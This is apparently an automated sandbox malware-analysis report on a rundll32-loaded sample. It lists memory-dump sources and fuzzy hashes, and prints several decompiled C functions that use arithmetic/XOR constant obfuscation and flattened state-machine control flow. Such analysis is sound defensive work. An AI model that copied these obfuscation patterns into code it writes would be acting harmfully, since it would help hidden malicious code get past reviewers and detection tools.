                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00684346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				char _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				void* _t146;
                                                                                                                      				void* _t165;
                                                                                                                      				signed int _t170;
                                                                                                                      				signed int _t171;
                                                                                                                      				signed int _t172;
                                                                                                                      				signed int _t173;
                                                                                                                      				signed int _t174;
                                                                                                                      				void* _t177;
                                                                                                                      				intOrPtr* _t196;
                                                                                                                      				void* _t197;
                                                                                                                      				signed int* _t200;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_t196 = __ecx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t146);
                                                                                                                      				_v8 = 0x1587dd;
                                                                                                                      				_t200 =  &(( &_v72)[4]);
                                                                                                                      				_t197 = 0;
                                                                                                                      				_v4 = _v4 & 0;
                                                                                                                      				_t177 = 0x762b00a;
                                                                                                                      				_v40 = 0x54d1b5;
                                                                                                                      				_t170 = 0x79;
                                                                                                                      				_v40 = _v40 / _t170;
                                                                                                                      				_v40 = _v40 ^ 0x0000b372;
                                                                                                                      				_v16 = 0xa1afdd;
                                                                                                                      				_v16 = _v16 >> 0xd;
                                                                                                                      				_v16 = _v16 ^ 0x0000050c;
                                                                                                                      				_v68 = 0x910a11;
                                                                                                                      				_t171 = 0x13;
                                                                                                                      				_v68 = _v68 / _t171;
                                                                                                                      				_v68 = _v68 << 2;
                                                                                                                      				_v68 = _v68 + 0x13e3;
                                                                                                                      				_v68 = _v68 ^ 0x00184f98;
                                                                                                                      				_v32 = 0xaf4665;
                                                                                                                      				_t172 = 0x26;
                                                                                                                      				_v32 = _v32 * 0x1c;
                                                                                                                      				_v32 = _v32 ^ 0x13220c8d;
                                                                                                                      				_v56 = 0xf39368;
                                                                                                                      				_v56 = _v56 + 0xf012;
                                                                                                                      				_v56 = _v56 / _t172;
                                                                                                                      				_v56 = _v56 ^ 0x000d8e66;
                                                                                                                      				_v36 = 0xa121b7;
                                                                                                                      				_v36 = _v36 + 0x3186;
                                                                                                                      				_v36 = _v36 ^ 0x00aec580;
                                                                                                                      				_v72 = 0x8bd634;
                                                                                                                      				_t173 = 0x16;
                                                                                                                      				_v72 = _v72 / _t173;
                                                                                                                      				_v72 = _v72 | 0xc3992ef3;
                                                                                                                      				_v72 = _v72 + 0xf49;
                                                                                                                      				_v72 = _v72 ^ 0xc3912c07;
                                                                                                                      				_v24 = 0xbc86c6;
                                                                                                                      				_v24 = _v24 | 0x4f3bdf6c;
                                                                                                                      				_v24 = _v24 ^ 0x4fbb36fd;
                                                                                                                      				_v64 = 0xf11315;
                                                                                                                      				_v64 = _v64 | 0x791eed70;
                                                                                                                      				_v64 = _v64 + 0xffff781b;
                                                                                                                      				_v64 = _v64 | 0xb4748ed7;
                                                                                                                      				_v64 = _v64 ^ 0xfdf43fb6;
                                                                                                                      				_v28 = 0xa9ea5e;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 ^ 0x53d38433;
                                                                                                                      				_v44 = 0xab8ea7;
                                                                                                                      				_t174 = 0x5e;
                                                                                                                      				_v44 = _v44 / _t174;
                                                                                                                      				_v44 = _v44 >> 5;
                                                                                                                      				_v44 = _v44 ^ 0x00061aeb;
                                                                                                                      				_v48 = 0xf3254f;
                                                                                                                      				_v48 = _v48 + 0xffff7d1c;
                                                                                                                      				_v48 = _v48 ^ 0x338af708;
                                                                                                                      				_v48 = _v48 ^ 0x337c7814;
                                                                                                                      				_v60 = 0xe02c97;
                                                                                                                      				_v60 = _v60 * 0x4f;
                                                                                                                      				_v60 = _v60 + 0xffffa06e;
                                                                                                                      				_v60 = _v60 + 0x8165;
                                                                                                                      				_v60 = _v60 ^ 0x4522059f;
                                                                                                                      				_v52 = 0x13fe8b;
                                                                                                                      				_v52 = _v52 >> 6;
                                                                                                                      				_v52 = _v52 + 0xffffbd6d;
                                                                                                                      				_v52 = _v52 ^ 0x000eeb0b;
                                                                                                                      				_v20 = 0x7ee5fd;
                                                                                                                      				_v20 = _v20 | 0xb1050693;
                                                                                                                      				_v20 = _v20 ^ 0xb17ba1e4;
                                                                                                                      				do {
                                                                                                                      					while(_t177 != 0x29b5a10) {
                                                                                                                      						if(_t177 == 0x761c4cc) {
                                                                                                                      							_push(_t177);
                                                                                                                      							_t165 = E0068AE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
                                                                                                                      							_t200 =  &(_t200[0xa]);
                                                                                                                      							if(_t165 != 0) {
                                                                                                                      								_t177 = 0x29b5a10;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t177 == 0x762b00a) {
                                                                                                                      								_t177 = 0x761c4cc;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t177 != 0x7f1be9f) {
                                                                                                                      									goto L13;
                                                                                                                      								} else {
                                                                                                                      									_push(_t177);
                                                                                                                      									E0068AE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
                                                                                                                      									 *_t196 = _v12;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t197;
                                                                                                                      					}
                                                                                                                      					_push(_t177);
                                                                                                                      					_push(_t177);
                                                                                                                      					_t197 = E00687FF2(_v12);
                                                                                                                      					if(_t197 == 0) {
                                                                                                                      						_t177 = 0xc410c1b;
                                                                                                                      						goto L13;
                                                                                                                      					} else {
                                                                                                                      						_t177 = 0x7f1be9f;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L6;
                                                                                                                      					L13:
                                                                                                                      				} while (_t177 != 0xc410c1b);
                                                                                                                      				goto L6;
                                                                                                                      			}
































                                                                                                                      0x00684441
                                                                                                                      0x00684447
                                                                                                                      0x0068444f
                                                                                                                      0x00684457
                                                                                                                      0x0068445f
                                                                                                                      0x00684467
                                                                                                                      0x0068446f
                                                                                                                      0x00684477
                                                                                                                      0x0068447f
                                                                                                                      0x00684487
                                                                                                                      0x0068448f
                                                                                                                      0x00684497
                                                                                                                      0x0068449f
                                                                                                                      0x006844a7
                                                                                                                      0x006844ac
                                                                                                                      0x006844b4
                                                                                                                      0x006844c0
                                                                                                                      0x006844c3
                                                                                                                      0x006844c7
                                                                                                                      0x006844cc
                                                                                                                      0x006844d9
                                                                                                                      0x006844e6
                                                                                                                      0x006844ee
                                                                                                                      0x006844f6
                                                                                                                      0x006844fe
                                                                                                                      0x0068450b
                                                                                                                      0x0068450f
                                                                                                                      0x00684517
                                                                                                                      0x0068451f
                                                                                                                      0x00684527
                                                                                                                      0x0068452f
                                                                                                                      0x00684534
                                                                                                                      0x0068453c
                                                                                                                      0x00684544
                                                                                                                      0x0068454c
                                                                                                                      0x00684554
                                                                                                                      0x0068455c
                                                                                                                      0x0068455c
                                                                                                                      0x00684566
                                                                                                                      0x006845bd
                                                                                                                      0x006845e3
                                                                                                                      0x006845e8
                                                                                                                      0x006845ed
                                                                                                                      0x006845ef
                                                                                                                      0x00000000
                                                                                                                      0x006845ef
                                                                                                                      0x00684568
                                                                                                                      0x0068456e
                                                                                                                      0x006845b9
                                                                                                                      0x00000000
                                                                                                                      0x00684570
                                                                                                                      0x00684576
                                                                                                                      0x00000000
                                                                                                                      0x0068457c
                                                                                                                      0x0068457c
                                                                                                                      0x006845a1
                                                                                                                      0x006845ad
                                                                                                                      0x006845ad
                                                                                                                      0x00684576
                                                                                                                      0x0068456e
                                                                                                                      0x006845b0
                                                                                                                      0x006845b8
                                                                                                                      0x006845b8
                                                                                                                      0x00684606
                                                                                                                      0x00684607
                                                                                                                      0x0068460d
                                                                                                                      0x00684613
                                                                                                                      0x0068461f
                                                                                                                      0x00000000
                                                                                                                      0x00684615
                                                                                                                      0x00684615
                                                                                                                      0x00000000
                                                                                                                      0x00684615
                                                                                                                      0x00000000
                                                                                                                      0x00684624
                                                                                                                      0x00684624
                                                                                                                      0x00000000

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                      • Instruction ID: 231c57cba5445bd46fb6744b54e210afbae2240b3c854342e5103f67dbb54027
                                                                                                                      • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                      • Instruction Fuzzy Hash: 657124B21093429FD358DF21C98942FBBF2EB95718F10891DF29556260D7B2C949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0069894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				void* _t97;
                                                                                                                      				void* _t111;
                                                                                                                      				void* _t115;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t135;
                                                                                                                      				void* _t136;
                                                                                                                      				signed int _t137;
                                                                                                                      				signed int _t138;
                                                                                                                      				signed int _t139;
                                                                                                                      				signed int _t140;
                                                                                                                      				void* _t142;
                                                                                                                      				void* _t143;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t115 = __edx;
                                                                                                                      				_t135 = __ecx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t97);
                                                                                                                      				_v64 = 0x51cd23;
                                                                                                                      				_t143 = _t142 + 0x18;
                                                                                                                      				_t136 = 0;
                                                                                                                      				_t117 = 0x1f0121b;
                                                                                                                      				_t137 = 0x4d;
                                                                                                                      				_v64 = _v64 / _t137;
                                                                                                                      				_v64 = _v64 >> 9;
                                                                                                                      				_v64 = _v64 ^ 0x00032222;
                                                                                                                      				_v68 = 0xd4b8b7;
                                                                                                                      				_v68 = _v68 + 0xffffd2af;
                                                                                                                      				_v68 = _v68 ^ 0xd36e67b3;
                                                                                                                      				_v68 = _v68 ^ 0xd3b4aa1e;
                                                                                                                      				_v76 = 0x6efd74;
                                                                                                                      				_v76 = _v76 << 5;
                                                                                                                      				_v76 = _v76 ^ 0x2f6bad1f;
                                                                                                                      				_t138 = 0x34;
                                                                                                                      				_v76 = _v76 / _t138;
                                                                                                                      				_v76 = _v76 ^ 0x00af6c6b;
                                                                                                                      				_v52 = 0x9958c4;
                                                                                                                      				_v52 = _v52 + 0xffff4241;
                                                                                                                      				_v52 = _v52 ^ 0x009a50fc;
                                                                                                                      				_v56 = 0x2e84bf;
                                                                                                                      				_t139 = 0x72;
                                                                                                                      				_v56 = _v56 * 0x77;
                                                                                                                      				_v56 = _v56 ^ 0x15969b56;
                                                                                                                      				_v80 = 0x2bfbd3;
                                                                                                                      				_v80 = _v80 | 0xbb654ab5;
                                                                                                                      				_v80 = _v80 * 0x48;
                                                                                                                      				_v80 = _v80 >> 8;
                                                                                                                      				_v80 = _v80 ^ 0x00b72d27;
                                                                                                                      				_v60 = 0xb8f349;
                                                                                                                      				_v60 = _v60 / _t139;
                                                                                                                      				_v60 = _v60 ^ 0xcb885b35;
                                                                                                                      				_v60 = _v60 ^ 0xcb801a24;
                                                                                                                      				_v72 = 0xbf562d;
                                                                                                                      				_t140 = 0x42;
                                                                                                                      				_v72 = _v72 / _t140;
                                                                                                                      				_v72 = _v72 ^ 0xd5944d41;
                                                                                                                      				_v72 = _v72 ^ 0x4a8545c0;
                                                                                                                      				_v72 = _v72 ^ 0x9f1c34cb;
                                                                                                                      				_v48 = 0xda7c79;
                                                                                                                      				_v48 = _v48 << 0xc;
                                                                                                                      				_v48 = _v48 ^ 0xa7c49699;
                                                                                                                      				do {
                                                                                                                      					while(_t117 != 0x1f0121b) {
                                                                                                                      						if(_t117 == 0x20f75ec) {
                                                                                                                      							E00683DBC( &_v44, _t115, _v64, _v68, _v76);
                                                                                                                      							_t143 = _t143 + 0xc;
                                                                                                                      							_t117 = 0x98c428b;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t117 == 0x98c428b) {
                                                                                                                      								_t111 = E00682A21(_v52, _v56,  &_v44, _t135, _v80);
                                                                                                                      								_t143 = _t143 + 0xc;
                                                                                                                      								__eflags = _t111;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t117 = 0xea94eac;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t149 = _t117 - 0xea94eac;
                                                                                                                      								if(_t117 != 0xea94eac) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									E0069D97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
                                                                                                                      									_t136 =  !=  ? 1 : _t136;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t136;
                                                                                                                      					}
                                                                                                                      					_t117 = 0x20f75ec;
                                                                                                                      					L11:
                                                                                                                      					__eflags = _t117 - 0x3544eb3;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L6;
                                                                                                                      			}


























                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                      • Instruction ID: 924e226e606a0d5193df31a0bf7ca883a6014ac438c1664c4bfe8b47e3da6922
                                                                                                                      • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                      • Instruction Fuzzy Hash: E0517771108301AFCB94CF22C98681BBBE6FBD8748F50892DF59597660D772CA19CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0069AC3A(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t82;
                                                                                                                      				signed int _t85;
                                                                                                                      				signed int _t86;
                                                                                                                      				void* _t88;
                                                                                                                      				void* _t96;
                                                                                                                      				void* _t97;
                                                                                                                      				signed int* _t99;
                                                                                                                      
                                                                                                                      				_t88 = __ecx;
                                                                                                                      				_t99 =  &_v28;
                                                                                                                      				_v24 = 0x5aa995;
                                                                                                                      				_v24 = _v24 | 0x25663b9c;
                                                                                                                      				_v24 = _v24 << 6;
                                                                                                                      				_t85 = 0x11;
                                                                                                                      				_v24 = _v24 / _t85;
                                                                                                                      				_t96 = 0;
                                                                                                                      				_v24 = _v24 ^ 0x05a97123;
                                                                                                                      				_t97 = 0xfe6f9f;
                                                                                                                      				_v16 = 0x9f09af;
                                                                                                                      				_v16 = _v16 + 0xcb37;
                                                                                                                      				_v16 = _v16 ^ 0x3a843722;
                                                                                                                      				_v16 = _v16 ^ 0x3a14bc19;
                                                                                                                      				_v28 = 0x7e93e4;
                                                                                                                      				_v28 = _v28 << 0xa;
                                                                                                                      				_t86 = 0x1a;
                                                                                                                      				_v28 = _v28 / _t86;
                                                                                                                      				_v28 = _v28 ^ 0x4056cd73;
                                                                                                                      				_v28 = _v28 ^ 0x49f3cf3d;
                                                                                                                      				_v4 = 0x47c602;
                                                                                                                      				_v4 = _v4 ^ 0xe3aa640e;
                                                                                                                      				_v4 = _v4 | 0xd85731ad;
                                                                                                                      				_v4 = _v4 ^ 0xfbf46e2b;
                                                                                                                      				_v8 = 0x201e29;
                                                                                                                      				_v8 = _v8 << 0x10;
                                                                                                                      				_v8 = _v8 * 0x48;
                                                                                                                      				_v8 = _v8 ^ 0x7b8200e2;
                                                                                                                      				_v12 = 0x18f9c1;
                                                                                                                      				_v12 = _v12 * 0x54;
                                                                                                                      				_v12 = _v12 << 6;
                                                                                                                      				_v12 = _v12 ^ 0x0c72dcb8;
                                                                                                                      				_v20 = 0xd6b502;
                                                                                                                      				_v20 = _v20 * 0x55;
                                                                                                                      				_v20 = _v20 << 0xd;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x00034ef9;
                                                                                                                      				do {
                                                                                                                      					while(_t97 != 0xfe6f9f) {
                                                                                                                      						if(_t97 == 0x2f82a60) {
                                                                                                                      							_push(_t88);
                                                                                                                      							_push(_t88);
                                                                                                                      							_t82 = E0068474B();
                                                                                                                      							_t99 =  &(_t99[2]);
                                                                                                                      							_t97 = 0x6e030e4;
                                                                                                                      							_t96 = _t96 + _t82;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t97 != 0x6e030e4) {
                                                                                                                      								goto L8;
                                                                                                                      							} else {
                                                                                                                      								_t96 = _t96 + E0069C2F8(_v4, _t88 + 4, _v8, _v12, _v20);
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L5:
                                                                                                                      						return _t96;
                                                                                                                      					}
                                                                                                                      					_t97 = 0x2f82a60;
                                                                                                                      					L8:
                                                                                                                      				} while (_t97 != 0xea6061f);
                                                                                                                      				goto L5;
                                                                                                                      			}


                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                      • Instruction ID: f30aa20941f772a2b913a878155b00d89673dde0aea3b99e97ac386be9b4c2af
                                                                                                                      • Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                      • Instruction Fuzzy Hash: 8C3153725083028FC318CF25D98944BFBE1FBD8798F108A1DF5A9A7221D375DA498B97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E00688969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				void* _t84;
                                                                                                                      				signed int _t99;
                                                                                                                      				signed int _t103;
                                                                                                                      				void* _t109;
                                                                                                                      				signed int _t110;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_t109 = __edx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E006920B9(_t84);
                                                                                                                      				_v40 = _v40 & 0x00000000;
                                                                                                                      				_v36 = _v36 & 0x00000000;
                                                                                                                      				_v44 = 0x779abe;
                                                                                                                      				_v20 = 0xb5573d;
                                                                                                                      				_v20 = _v20 ^ 0xbb0d078e;
                                                                                                                      				_t103 = 0x58;
                                                                                                                      				_v20 = _v20 * 0x30;
                                                                                                                      				_v20 = _v20 ^ 0x328c396d;
                                                                                                                      				_v16 = 0x362481;
                                                                                                                      				_v16 = _v16 + 0x16cb;
                                                                                                                      				_v16 = _v16 | 0xfe676eb4;
                                                                                                                      				_v16 = _v16 ^ 0xfe76a30b;
                                                                                                                      				_v32 = 0xc91798;
                                                                                                                      				_v32 = _v32 * 0x65;
                                                                                                                      				_v32 = _v32 ^ 0x4f59c84a;
                                                                                                                      				_v28 = 0xb97254;
                                                                                                                      				_v28 = _v28 / _t103;
                                                                                                                      				_v28 = _v28 ^ 0x000673a7;
                                                                                                                      				_v12 = 0xb6c56;
                                                                                                                      				_v12 = _v12 * 0x2a;
                                                                                                                      				_v12 = _v12 << 1;
                                                                                                                      				_v12 = _v12 * 0x5b;
                                                                                                                      				_v12 = _v12 ^ 0x5515a6e4;
                                                                                                                      				_v8 = 0x1f2e02;
                                                                                                                      				_v8 = _v8 * 0x66;
                                                                                                                      				_v8 = _v8 * 0x79;
                                                                                                                      				_v8 = _v8 + 0xffff535b;
                                                                                                                      				_v8 = _v8 ^ 0xdf3e36a5;
                                                                                                                      				_v24 = 0x692813;
                                                                                                                      				_v24 = _v24 >> 0xb;
                                                                                                                      				_v24 = _v24 + 0xffffcb9d;
                                                                                                                      				_v24 = _v24 ^ 0xfffb0f76;
                                                                                                                      				E0069D25E(_t103);
                                                                                                                      				_v16 = 0x87422f;
                                                                                                                      				_v16 = _v16 | 0xfc58150b;
                                                                                                                      				_v16 = _v16 ^ 0xfcdf572b;
                                                                                                                      				_v20 = 0xc6266d;
                                                                                                                      				_v20 = _v20 << 0xa;
                                                                                                                      				_v20 = _v20 + 0xffff7638;
                                                                                                                      				_v20 = _v20 ^ 0x18992a28;
                                                                                                                      				_t99 = E00690AE0(_v20, _v16);
                                                                                                                      				_push(_v24);
                                                                                                                      				_t110 = _t99;
                                                                                                                      				_push(_t109);
                                                                                                                      				_push(_t110);
                                                                                                                      				_push(1);
                                                                                                                      				E006880E3(_v12, _v8);
                                                                                                                      				 *((short*)(_t109 + _t110 * 2)) = 0;
                                                                                                                      				return 0;
                                                                                                                      			}



















                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                      • Instruction ID: 568f9e868213b2ff3465a4fe6b51f87b4a41b72dabc2e6ce87a1c53b059eb340
                                                                                                                      • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                      • Instruction Fuzzy Hash: 1241DD71C0121AEBCF18CFE5C98A9EEBFB5FB44314F108199D525AA260D3B95B45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
